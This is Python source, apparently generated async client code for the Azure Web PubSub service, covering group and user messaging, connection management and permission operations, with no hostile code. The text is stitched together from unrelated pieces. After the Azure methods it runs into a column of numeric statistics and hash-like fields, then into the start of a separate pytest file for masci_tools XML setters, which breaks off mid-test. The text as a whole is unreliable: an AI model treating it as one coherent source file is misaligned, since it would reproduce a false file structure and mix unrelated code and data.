send_to_connection.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}/:send'}  # type: ignore
@distributed_trace_async
async def group_exists(
    self,
    hub: str,
    group: str,
    **kwargs: Any
) -> None:
    """Check if there are any client connections inside the given group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_group_exists_request(
        hub=hub,
        group=group,
        template_url=self.group_exists.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # 200 means the group has connections, 404 that it does not; both are valid outcomes.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
group_exists.metadata = {'url': '/api/hubs/{hub}/groups/{group}'}  # type: ignore
@distributed_trace_async
async def close_group_connections(
    self,
    hub: str,
    group: str,
    *,
    excluded: Optional[List[str]] = None,
    reason: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Close connections in the specific group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :keyword excluded: Exclude these connectionIds when closing the connections in the group.
    :paramtype excluded: list[str]
    :keyword reason: The reason closing the client connection.
    :paramtype reason: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_close_group_connections_request(
        hub=hub,
        group=group,
        excluded=excluded,
        reason=reason,
        template_url=self.close_group_connections.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful close.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
close_group_connections.metadata = {'url': '/api/hubs/{hub}/groups/{group}/:closeConnections'}  # type: ignore
@distributed_trace_async
async def send_to_group(
    self,
    hub: str,
    group: str,
    message: Union[IO, str],
    *,
    excluded: Optional[List[str]] = None,
    **kwargs: Any
) -> None:
    """Send content inside request body to a group of connections.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :param message: The payload body.
    :type message: IO or str
    :keyword excluded: Excluded connection Ids.
    :paramtype excluded: list[str]
    :keyword str content_type: Media type of the body sent to the API. Default value is
     "text/plain". Allowed values are: "application/json", "application/octet-stream",
     "text/plain".
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop('content_type', "text/plain")  # type: Optional[str]
    json = None
    content = None
    # Compare only the media type; ignore parameters such as '; charset=utf-8'.
    media_type = content_type.split(";")[0]
    if media_type in ('application/json', 'application/octet-stream'):
        content = message
    elif media_type == 'text/plain':
        json = message
    else:
        raise ValueError(
            "The content_type '{}' is not one of the allowed values: "
            "['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
        )
    request = build_send_to_group_request(
        hub=hub,
        group=group,
        content_type=content_type,
        excluded=excluded,
        json=json,
        content=content,
        template_url=self.send_to_group.metadata['url'],
    )
    path_format_arguments = {
        "Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    }
    request.url = self._client.format_url(request.url, **path_format_arguments)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # 202 Accepted is the only success status for a send.
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})
send_to_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/:send'}  # type: ignore
@distributed_trace_async
async def add_connection_to_group(
    self,
    hub: str,
    group: str,
    connection_id: str,
    **kwargs: Any
) -> None:
    """Add a connection to the target group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_add_connection_to_group_request(
        hub=hub,
        group=group,
        connection_id=connection_id,
        template_url=self.add_connection_to_group.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # NOTE(review): 404 is treated as success here (connection not found) — confirm intended.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
add_connection_to_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def remove_connection_from_group(
    self,
    hub: str,
    group: str,
    connection_id: str,
    **kwargs: Any
) -> None:
    """Remove a connection from the target group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_remove_connection_from_group_request(
        hub=hub,
        group=group,
        connection_id=connection_id,
        template_url=self.remove_connection_from_group.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful removal.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
remove_connection_from_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def user_exists(
    self,
    hub: str,
    user_id: str,
    **kwargs: Any
) -> None:
    """Check if there are any client connections connected for the given user.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param user_id: Target user Id.
    :type user_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_user_exists_request(
        hub=hub,
        user_id=user_id,
        template_url=self.user_exists.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # 200 means the user has connections, 404 that it does not; both are valid outcomes.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
user_exists.metadata = {'url': '/api/hubs/{hub}/users/{userId}'}  # type: ignore
@distributed_trace_async
async def close_user_connections(
    self,
    hub: str,
    user_id: str,
    *,
    excluded: Optional[List[str]] = None,
    reason: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Close connections for the specific user.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param user_id: The user Id.
    :type user_id: str
    :keyword excluded: Exclude these connectionIds when closing the connections for the user.
    :paramtype excluded: list[str]
    :keyword reason: The reason closing the client connection.
    :paramtype reason: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_close_user_connections_request(
        hub=hub,
        user_id=user_id,
        excluded=excluded,
        reason=reason,
        template_url=self.close_user_connections.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful close.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
close_user_connections.metadata = {'url': '/api/hubs/{hub}/users/{userId}/:closeConnections'}  # type: ignore
@distributed_trace_async
async def send_to_user(
    self,
    hub: str,
    user_id: str,
    message: Union[IO, str],
    **kwargs: Any
) -> None:
    """Send content inside request body to the specific user.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param user_id: The user Id.
    :type user_id: str
    :param message: The payload body.
    :type message: IO or str
    :keyword str content_type: Media type of the body sent to the API. Default value is
     "text/plain". Allowed values are: "application/json", "application/octet-stream",
     "text/plain".
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop('content_type', "text/plain")  # type: Optional[str]
    json = None
    content = None
    # Compare only the media type; ignore parameters such as '; charset=utf-8'.
    media_type = content_type.split(";")[0]
    if media_type in ('application/json', 'application/octet-stream'):
        content = message
    elif media_type == 'text/plain':
        json = message
    else:
        raise ValueError(
            "The content_type '{}' is not one of the allowed values: "
            "['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
        )
    request = build_send_to_user_request(
        hub=hub,
        user_id=user_id,
        content_type=content_type,
        json=json,
        content=content,
        template_url=self.send_to_user.metadata['url'],
    )
    path_format_arguments = {
        "Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    }
    request.url = self._client.format_url(request.url, **path_format_arguments)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # 202 Accepted is the only success status for a send.
    if response.status_code not in [202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})
send_to_user.metadata = {'url': '/api/hubs/{hub}/users/{userId}/:send'}  # type: ignore
@distributed_trace_async
async def add_user_to_group(
    self,
    hub: str,
    group: str,
    user_id: str,
    **kwargs: Any
) -> None:
    """Add a user to the target group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :param user_id: Target user Id.
    :type user_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_add_user_to_group_request(
        hub=hub,
        group=group,
        user_id=user_id,
        template_url=self.add_user_to_group.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # NOTE(review): 404 is treated as success here (user not found) — confirm intended.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
add_user_to_group.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups/{group}'}  # type: ignore
@distributed_trace_async
async def remove_user_from_group(
    self,
    hub: str,
    group: str,
    user_id: str,
    **kwargs: Any
) -> None:
    """Remove a user from the target group.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param group: Target group name, which length should be greater than 0 and less than 1025.
    :type group: str
    :param user_id: Target user Id.
    :type user_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_remove_user_from_group_request(
        hub=hub,
        group=group,
        user_id=user_id,
        template_url=self.remove_user_from_group.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful removal.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
remove_user_from_group.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups/{group}'}  # type: ignore
@distributed_trace_async
async def remove_user_from_all_groups(
    self,
    hub: str,
    user_id: str,
    **kwargs: Any
) -> None:
    """Remove a user from all groups.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param user_id: Target user Id.
    :type user_id: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_remove_user_from_all_groups_request(
        hub=hub,
        user_id=user_id,
        template_url=self.remove_user_from_all_groups.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful removal.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
remove_user_from_all_groups.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups'}  # type: ignore
@distributed_trace_async
async def grant_permission(
    self,
    hub: str,
    permission: str,
    connection_id: str,
    *,
    target_name: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Grant permission to the connection.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param permission: The permission: current supported actions are joinLeaveGroup and
     sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
    :type permission: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :keyword target_name: The meaning of the target depends on the specific permission. For
     joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group
     name.
    :paramtype target_name: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_grant_permission_request(
        hub=hub,
        permission=permission,
        connection_id=connection_id,
        target_name=target_name,
        template_url=self.grant_permission.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 200 OK is a successful grant.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 200:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
grant_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def revoke_permission(
    self,
    hub: str,
    permission: str,
    connection_id: str,
    *,
    target_name: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Revoke permission for the connection.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param permission: The permission: current supported actions are joinLeaveGroup and
     sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
    :type permission: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :keyword target_name: The meaning of the target depends on the specific permission. For
     joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group
     name.
    :paramtype target_name: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_revoke_permission_request(
        hub=hub,
        permission=permission,
        connection_id=connection_id,
        target_name=target_name,
        template_url=self.revoke_permission.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # Only 204 No Content is a successful revoke.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code != 204:
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
revoke_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'}  # type: ignore
@distributed_trace_async
async def check_permission(
    self,
    hub: str,
    permission: str,
    connection_id: str,
    *,
    target_name: Optional[str] = None,
    **kwargs: Any
) -> None:
    """Check if a connection has permission to the specified action.

    :param hub: Target hub name, which should start with alphabetic characters and only contain
     alpha-numeric characters or underscore.
    :type hub: str
    :param permission: The permission: current supported actions are joinLeaveGroup and
     sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
    :type permission: str
    :param connection_id: Target connection Id.
    :type connection_id: str
    :keyword target_name: The meaning of the target depends on the specific permission. For
     joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group
     name.
    :paramtype target_name: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    custom_deserializer = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError,
        404: ResourceNotFoundError,
        409: ResourceExistsError,
        **kwargs.pop('error_map', {}),
    }

    # Build the request and fill the endpoint into the URL template.
    request = build_check_permission_request(
        hub=hub,
        permission=permission,
        connection_id=connection_id,
        target_name=target_name,
        template_url=self.check_permission.metadata['url'],
    )
    request.url = self._client.format_url(
        request.url,
        Endpoint=self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
    )

    # 200 means permission is held, 404 that it is not; both are valid outcomes.
    pipeline_result = await self._client._pipeline.run(request, stream=False, **kwargs)
    raw_response = pipeline_result.http_response
    if raw_response.status_code not in (200, 404):
        map_error(status_code=raw_response.status_code, response=raw_response, error_map=error_map)
        raise HttpResponseError(response=raw_response)

    if custom_deserializer:
        return custom_deserializer(pipeline_result, None, {})
check_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'}  # type: ignore
| 38.933552
| 719
| 0.636241
| 5,290
| 47,460
| 5.523629
| 0.046314
| 0.027379
| 0.017796
| 0.030116
| 0.941752
| 0.921766
| 0.895414
| 0.868207
| 0.848392
| 0.833333
| 0
| 0.00882
| 0.266603
| 47,460
| 1,218
| 720
| 38.965517
| 0.830666
| 0.025095
| 0
| 0.764457
| 0
| 0
| 0.082096
| 0.046691
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012694
| 0
| 0.043724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c02cb6ee5cfe32b54b7d7d6bc865a23c571f0f6
| 2,991
|
py
|
Python
|
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
from engine.pieces.piece import Piece
from engine.position import Position
class Rook(Piece):
    """Rook chess piece: slides any number of squares along a rank or file.

    The original implementation repeated the same ray-walking loop four
    times per method (once per direction); the logic is factored into a
    single `_ray` helper shared by both move generators.
    """

    # The four orthogonal sliding directions as (dx, dy) unit steps:
    # +x, -x, +y, -y — same enumeration order as the original code, so
    # the produced position lists keep their original ordering.
    _DIRECTIONS = ((1, 0), (-1, 0), (0, 1), (0, -1))

    def __init__(self, color):
        # Symbol "R", piece value 4 (value scale defined by Piece — see engine.pieces.piece).
        super(Rook, self).__init__("R", color, 4)

    @staticmethod
    def _ray(from_x, from_y, dx, dy, board):
        """Yield (x, y, square) along one direction, in increasing distance.

        Stops at the board edge; the first non-empty square (the blocker)
        is yielded and then the ray terminates.
        """
        x, y = from_x + dx, from_y + dy
        while 0 <= x < 8 and 0 <= y < 8:
            square = board[x][y]
            yield x, y, square
            if not square.is_empty():
                return  # blocked: nothing beyond the first occupied square
            x += dx
            y += dy

    @staticmethod
    def pseudo_legal_pos(from_x, from_y, config, color):
        """Return pseudo-legal destination Positions for a rook of ``color``.

        Includes every empty square along each ray plus the first enemy
        piece (a capture); a friendly blocker is excluded. "Pseudo" legal:
        checks on the own king are not considered here.
        """
        pos = []
        board = config.board
        for dx, dy in Rook._DIRECTIONS:
            for x, y, square in Rook._ray(from_x, from_y, dx, dy, board):
                if square.is_empty() or square.piece.color != color:
                    pos.append(Position(x, y))
        return pos

    @staticmethod
    def threats_pos(from_x, from_y, config, color):
        """Return every square attacked by the rook.

        Unlike :meth:`pseudo_legal_pos`, the first occupied square is
        included regardless of its color (a friendly piece counts as
        defended). ``color`` is kept for signature parity with the other
        pieces even though it is not consulted.
        """
        pos = []
        board = config.board
        for dx, dy in Rook._DIRECTIONS:
            for x, y, _square in Rook._ray(from_x, from_y, dx, dy, board):
                pos.append(Position(x, y))
        return pos

    def get_pseudo_legal_pos(self, from_x, from_y, config):
        """Instance wrapper binding this rook's color."""
        return Rook.pseudo_legal_pos(from_x, from_y, config, self.color)

    def get_threats_pos(self, from_x, from_y, config):
        """Instance wrapper binding this rook's color."""
        return Rook.threats_pos(from_x, from_y, config, self.color)
| 39.88
| 122
| 0.558676
| 494
| 2,991
| 3.133603
| 0.074899
| 0.148579
| 0.124031
| 0.142119
| 0.885013
| 0.885013
| 0.885013
| 0.875969
| 0.825581
| 0.782946
| 0
| 0.015919
| 0.306921
| 2,991
| 74
| 123
| 40.418919
| 0.730825
| 0
| 0
| 0.716418
| 0
| 0
| 0.000334
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0.029851
| 0.179104
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c2adcd3fb5c69974c3516612b7795920c27fd0d
| 45
|
py
|
Python
|
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
from . import coding_rate
from . import loss
| 15
| 25
| 0.777778
| 7
| 45
| 4.857143
| 0.714286
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 26
| 22.5
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c4f28d744366a182631518b5f9e3bd439b7bbf8
| 28,985
|
py
|
Python
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 15
|
2018-11-07T10:04:46.000Z
|
2021-11-08T20:51:08.000Z
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 120
|
2020-02-04T15:37:42.000Z
|
2022-03-17T10:49:40.000Z
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 11
|
2018-10-18T08:09:07.000Z
|
2022-02-22T15:45:21.000Z
|
# -*- coding: utf-8 -*-
"""
Tests for the basic xml setter functions
"""
import pytest
TEST_INPXML_PATH = 'fleur/Max-R5/FePt_film_SSFT_LO/files/inp2.xml'
def test_xml_set_attrib_value_no_create(load_inpxml):
    """xml_set_attrib_value_no_create sets a new attribute on a matching tag."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    # The attribute must not exist before the call.
    assert not eval_xpath(root, '/fleurInput/@TEST_ATT', list_return=True)

    tree = xml_set_attrib_value_no_create(tree, '/fleurInput', 'TEST_ATT', 'test')

    assert str(eval_xpath(root, '/fleurInput/@TEST_ATT')) == 'test'
def test_xml_set_attrib_value_no_create_not_str(load_inpxml):
    """Non-string attribute values are converted to their string representation."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    # The attribute must not exist before the call.
